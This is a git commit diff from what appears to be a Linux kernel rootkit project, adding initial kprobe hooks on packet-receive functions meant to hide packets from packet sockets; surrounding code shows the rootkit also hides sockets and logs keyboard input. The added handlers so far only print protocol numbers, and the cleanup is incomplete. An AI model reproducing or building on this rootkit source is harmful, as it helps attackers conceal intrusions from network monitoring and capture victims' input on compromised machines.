commit db731d9f7c963d43ba76edcddce3b2e24846f3d4
parent 76a91a44a79f7c53c480b576a1d854dd52f63c22
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Sat, 19 Dec 2020 18:35:20 +0100
Initial kprobe stuff
Diffstat:
3 files changed, 106 insertions(+), 0 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -22,6 +22,7 @@
#include "read.h"
#include "inputlog.h"
#include "sockhide.h"
+#include "packhide.h"
extern rootkit_t rootkit;
@@ -94,6 +95,8 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
+
+ hide_packets();
}
void
@@ -121,6 +124,8 @@ remove_hooks(void)
if (rootkit.logging_input)
unlog_input();
+
+ unhide_packets();
}
void
diff --git a/src/packhide.c b/src/packhide.c
@@ -0,0 +1,98 @@
+#include <linux/kernel.h>
+#include <linux/kprobes.h>
+#include <linux/skbuff.h>
+#include <uapi/linux/if_packet.h>
+
+#include "common.h"
+#include "hook.h"
+
+static int g7_packet_rcv(struct kprobe *, struct pt_regs *);
+static int g7_tpacket_rcv(struct kprobe *, struct pt_regs *);
+static int g7_packet_rcv_spkt(struct kprobe *, struct pt_regs *);
+static int g7_fault(struct kprobe *, struct pt_regs *, int);
+static void g7_post(struct kprobe *, struct pt_regs *m, unsigned long);
+
+static struct kprobe p_rcv = {
+ .symbol_name = "packet_rcv",
+};
+
+static struct kprobe tp_rcv = {
+ .symbol_name = "tpacket_rcv",
+};
+
+static struct kprobe p_rcv_spkt = {
+ .symbol_name = "packet_rcv_spkt",
+};
+
+void
+hide_packets(void)
+{
+ p_rcv.pre_handler = g7_packet_rcv;
+ p_rcv.post_handler = g7_post;
+ p_rcv.fault_handler = g7_fault;
+
+ tp_rcv.pre_handler = g7_tpacket_rcv;
+ tp_rcv.post_handler = g7_post;
+ tp_rcv.fault_handler = g7_fault;
+
+ p_rcv_spkt.pre_handler = g7_packet_rcv_spkt;
+ p_rcv_spkt.post_handler = g7_post;
+ p_rcv_spkt.fault_handler = g7_fault;
+
+ if(register_kprobe(&p_rcv))
+ DEBUG_INFO("[g7] Could not insert kprobe p_rcv\n");
+
+ if(register_kprobe(&tp_rcv))
+ DEBUG_INFO("[g7] Could not insert kprobe tp_rcv\n");
+}
+
+void
+unhide_packets(void)
+{
+ unregister_kprobe(&p_rcv);
+}
+
+static int
+g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[p_rcv] proto is %0X\n", skb->protocol);
+
+
+ return 0;
+}
+
+static int
+g7_tpacket_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[tp_rcv] proto is %0X\n", skb->protocol);
+
+ return 0;
+}
+
+static int g7_packet_rcv_spkt(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[tp_rcv] proto is %0X\n", skb->protocol);
+
+ return 0;
+}
+
+static void
+g7_post(struct kprobe *kp, struct pt_regs *pt_regs, unsigned long flags)
+{
+ return;
+}
+
+static int
+g7_fault(struct kprobe *kp, struct pt_regs *pt_regs, int trapnr)
+{
+ return 0;
+}
+\ No newline at end of file
diff --git a/src/packhide.h b/src/packhide.h
@@ -0,0 +1,2 @@
+void hide_packets(void);
+void unhide_packets(void);
